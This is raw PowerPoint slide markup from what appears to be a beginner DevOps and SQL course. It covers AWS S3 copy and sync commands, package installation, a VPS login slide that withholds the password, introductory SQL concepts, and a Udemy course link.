            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2250">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2550">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aws s3 cp anil s3://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2550">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>ocean5bucket - -recursive</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2550">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2550">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Or</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2550">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2550">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aws s3 sync anil s3://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2550">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>ocean5bucket</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2550">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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418"/>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t>Ref Links</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2561" name="Google Shape;2561;p4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https://linux.how2shout.com/add-a-new-key-pair-to-your-exisitng-aws-ec2-instances/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chemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://jennykibiri.hashnode.dev/jenkins-pipeline-to-build-and-deploy-a-frontend-application-on-aws-ec2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>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5" name="Shape 2565"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2566" name="Google Shape;2566;p41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Ref Links</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2567" name="Google Shape;2567;p419"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1292575"/>
            <a:ext cx="8520600" cy="24138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en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo apt install -y software-properties-common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>build-essential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zlib1g-dev libncurses5-dev libgdbm-dev libnss3-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev wget libbz2-dev </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>python3-full python3-pip  zip unzip wget vim nano apache2 certbot python3-certbot-apache</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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sp>
        <p:nvSpPr>
          <p:cNvPr id="2572" name="Google Shape;2572;p42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Live Server Credentials</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2573" name="Google Shape;2573;p420"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1149900" y="1076275"/>
            <a:ext cx="7021500" cy="341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800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VPS ( Virtual Private Server )</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP 38.242.236.173</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Username: root </a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password: Contact Me </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>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7" name="Shape 2577"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2578" name="Google Shape;2578;p421"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="30675" y="221600"/>
            <a:ext cx="9082650" cy="4541325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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422"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="425488" y="8634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700">
                <a:solidFill>
                  <a:srgbClr val="DC143C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4700">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tructured </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4700">
                <a:solidFill>
                  <a:srgbClr val="DC143C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4700">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uery </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4700">
                <a:solidFill>
                  <a:srgbClr val="DC143C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4700">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>anguage</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4700">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2584" name="Google Shape;2584;p422"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="6297" l="12336" r="9830" t="11600"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2113150" y="1625850"/>
            <a:ext cx="5145273" cy="3137175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2585" name="Google Shape;2585;p422"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7307646" y="188025"/>
            <a:ext cx="1703625" cy="485625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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9" name="Shape 2589"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2590" name="Google Shape;2590;p423"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="6860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chemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Core Concept</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4300">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2591" name="Google Shape;2591;p423"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2615375" y="1730600"/>
            <a:ext cx="3671100" cy="2690400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-438150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DATABASE</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-438150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TABLE</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-438150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DATA</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:srgbClr val="6AA84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ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246750" y="902650"/>
            <a:ext cx="8520600" cy="24975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b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Buy This </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Linux/Docker/DevOps/SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>ourse </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>rom </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>demy</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>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64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="959694"/>
            <a:ext cx="9144000" cy="3432956"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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424"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3812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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Who should learn SQL</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2597" name="Google Shape;2597;p424"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2457550" y="1377775"/>
            <a:ext cx="5750700" cy="2690400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DevOps Engineer</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Backend Engineer</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Database </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Administrators</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scientist</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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p425"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460250" y="14902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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pronunciation</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2603" name="Google Shape;2603;p425"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1241300" y="1680650"/>
            <a:ext cx="6137400" cy="1743900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-450850" lvl="0" marL="457200" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>See-Qual or SQL</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p: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426"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3812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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DATABASE</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2609" name="Google Shape;2609;p426"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493500" y="1406450"/>
            <a:ext cx="8226000" cy="3511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3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Database is a software/application which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
